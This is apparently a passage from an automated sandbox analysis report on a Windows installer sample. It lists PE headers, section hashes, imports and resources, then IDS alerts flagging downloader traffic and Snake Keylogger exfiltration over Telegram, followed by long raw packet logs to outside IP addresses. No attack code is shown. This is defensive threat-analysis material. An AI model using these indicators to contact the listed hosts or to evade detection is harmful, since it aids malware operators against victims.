                                          cmp ax, dx
                                          jne 00007F956115A8F9h
                                          inc ecx
                                          inc ecx
                                          cmp word ptr [ecx], dx
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                           Name | Virtual Address | Virtual Size | Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x69fd8 | .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x138e20 | 0x960 |
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                           .text | 0x1000 | 0x5d98 | 0x5e00 | 60fc9e652ab60b696b4471d2d740a415 | False | 0.6669714095744681 | data | 6.471759151304203 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .rdata | 0x7000 | 0x1354 | 0x1400 | 2f90a087fd075d2b61c65e6db9ea1417 | False | 0.4314453125 | data | 5.037502749366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .data | 0x9000 | 0x202b8 | 0x600 | 76eba87d06ba726298375b77b72945b6 | False | 0.4733072916666667 | data | 3.7505342023618717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .ndata | 0x2a000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                           .rsrc | 0x4f000 | 0x69fd8 | 0x6a000 | ba23276a82e0d244e1672be1b2a31f09 | False | 0.5017619582841981 | data | 5.158881628031345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                           RT_ICON | 0x4f328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.4722756457673758
                                           RT_ICON | 0x91350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.5095676091328523
                                           RT_ICON | 0xa1b78 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.5717626655455119
                                           RT_ICON | 0xab020 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.583641404805915
                                           RT_ICON | 0xb04a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.5690836088804913
                                           RT_ICON | 0xb46d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6310165975103734
                                           RT_ICON | 0xb6c78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.651735459662289
                                           RT_ICON | 0xb7d20 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.7151639344262295
                                           RT_DIALOG | 0xb86a8 | 0x100 | data | English | United States | 0.5234375
                                           RT_DIALOG | 0xb87a8 | 0x11c | data | English | United States | 0.6056338028169014
                                           RT_DIALOG | 0xb88c8 | 0x60 | data | English | United States | 0.7291666666666666
                                           RT_GROUP_ICON | 0xb8928 | 0x76 | data | English | United States | 0.7372881355932204
                                           RT_VERSION | 0xb89a0 | 0x2f8 | data | English | United States | 0.4986842105263158
                                           RT_MANIFEST | 0xb8c98 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
                                           DLL | Import
                                           KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                           USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                           GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                           SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                           ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                           COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                           ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                           VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                           Language of compilation system | Country where language is spoken | Map
                                           English | United States |
                                           Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                           2024-07-25T09:56:55.795858+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49746 | 443 | 192.168.2.4 | 188.114.96.3
                                           2024-07-25T09:56:44.263078+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           2024-07-25T09:57:07.855040+0200 | TCP | 2853006 | ETPRO MALWARE Snake Keylogger Telegram Exfil | 49753 | 443 | 192.168.2.4 | 149.154.167.220
                                           2024-07-25T09:56:49.886487+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49740 | 80 | 192.168.2.4 | 158.101.44.242
                                           2024-07-25T09:56:51.785131+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49742 | 13.85.23.86 | 192.168.2.4
                                           2024-07-25T09:56:47.794238+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49739 | 443 | 192.168.2.4 | 188.114.96.3
                                           2024-07-25T09:56:47.325602+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           2024-07-25T09:56:12.458951+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 40.127.169.103 | 192.168.2.4
                                           2024-07-25T09:56:41.888830+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           2024-07-25T09:56:53.587006+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49744 | 443 | 192.168.2.4 | 188.114.96.3
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Jul 25, 2024 09:56:37.410363913 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:37.410406113 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:37.410590887 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:37.423291922 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:37.423306942 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.243168116 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.243480921 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.438091993 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.438122988 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.438494921 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.438550949 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.442693949 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.488497972 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.888952971 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.889035940 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.889082909 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.889199972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.889199972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.889224052 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.889256954 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.889271021 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.895879984 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.895946980 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.896019936 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.896034956 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:41.896058083 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:41.896080017 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.056603909 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.056637049 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.056945086 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.056966066 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.057013988 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.062400103 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.062426090 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.062505007 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.062515974 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.062556028 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.066598892 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.066622019 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.066701889 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.066710949 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.066747904 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.249479055 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.249517918 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.249774933 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.249789000 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.249830961 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.262808084 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.262835979 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.262902021 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.262917995 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.262937069 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.262959957 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.266331911 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.266351938 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.266444921 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.266465902 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.266511917 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267251968 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.267308950 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267321110 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.267337084 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.267359972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267401934 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267721891 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267739058 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4
                                           Jul 25, 2024 09:56:42.267759085 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:42.267786980 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168
                                           Jul 25, 2024 09:56:43.308645964 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:43.313673019 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:43.313752890 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:43.313987970 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:43.325756073 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:44.039083958 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:44.043277025 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:44.050964117 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:44.221239090 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:44.263077974 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:44.889420986 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:44.889476061 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:44.889539957 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:44.891222000 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:44.891237974 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.663990974 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.664077044 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:45.667785883 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:45.667819023 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.668137074 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.674765110 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:45.720510960 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.804851055 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.804961920 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:45.805162907 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:45.811618090 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:45.821000099 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:45.826069117 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.189729929 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.192183018 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:47.192246914 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.192331076 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:47.192672968 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:47.192698956 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.325602055 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242
                                           Jul 25, 2024 09:56:47.655222893 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.660029888 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
                                           Jul 25, 2024 09:56:47.660083055 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.794159889 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                           Jul 25, 2024 09:56:47.794255018 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                          Jul 25, 2024 09:56:47.794342041 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.796514034 CEST49739443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:47.801449060 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.802651882 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.806840897 CEST8049737158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.806929111 CEST4973780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.807650089 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:47.807820082 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.807820082 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:47.814291000 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.885149002 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.886353970 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:49.886487007 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:49.886576891 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.886636019 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:49.886707067 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.886987925 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:49.887008905 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:50.421607971 CEST8049740158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:50.421715021 CEST4974080192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:50.883682013 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:50.885327101 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:50.885361910 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028048038 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028170109 CEST44349741188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:51.028218985 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:51.029905081 CEST49741443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:51.098606110 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.110266924 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:51.110337019 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.110867023 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:51.118768930 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:52.869508028 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:52.891863108 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.891932964 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:52.892046928 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.899127007 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:52.899162054 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.028841972 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.454088926 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.456223965 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.456252098 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587034941 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587136030 CEST44349744188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:53.587189913 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.589205027 CEST49744443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:53.593147993 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.594227076 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.598721981 CEST8049743158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:53.598788977 CEST4974380192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.599577904 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:53.599641085 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.599736929 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:53.606055021 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.177944899 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.185795069 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.185834885 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.186059952 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.186208010 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.186223030 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.217842102 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.673209906 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.683114052 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.683130026 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.795876026 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.795999050 CEST44349746188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:55.796066046 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.796824932 CEST49746443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:55.800887108 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.802016973 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810230970 CEST8049745158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.810245037 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:55.810306072 CEST4974580192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810350895 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.810894012 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:55.819715023 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.163333893 CEST8049747158.101.44.242192.168.2.4
                                          Jul 25, 2024 09:56:57.165545940 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165586948 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.165688038 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165971994 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.165983915 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.216424942 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.644305944 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.649885893 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.649898052 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766343117 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766453981 CEST44349748188.114.96.3192.168.2.4
                                          Jul 25, 2024 09:56:57.766621113 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.767107010 CEST49748443192.168.2.4188.114.96.3
                                          Jul 25, 2024 09:56:57.770610094 CEST4974780192.168.2.4158.101.44.242
                                          Jul 25, 2024 09:56:57.771846056 CEST4974980192.168.2.4158.101.44.242
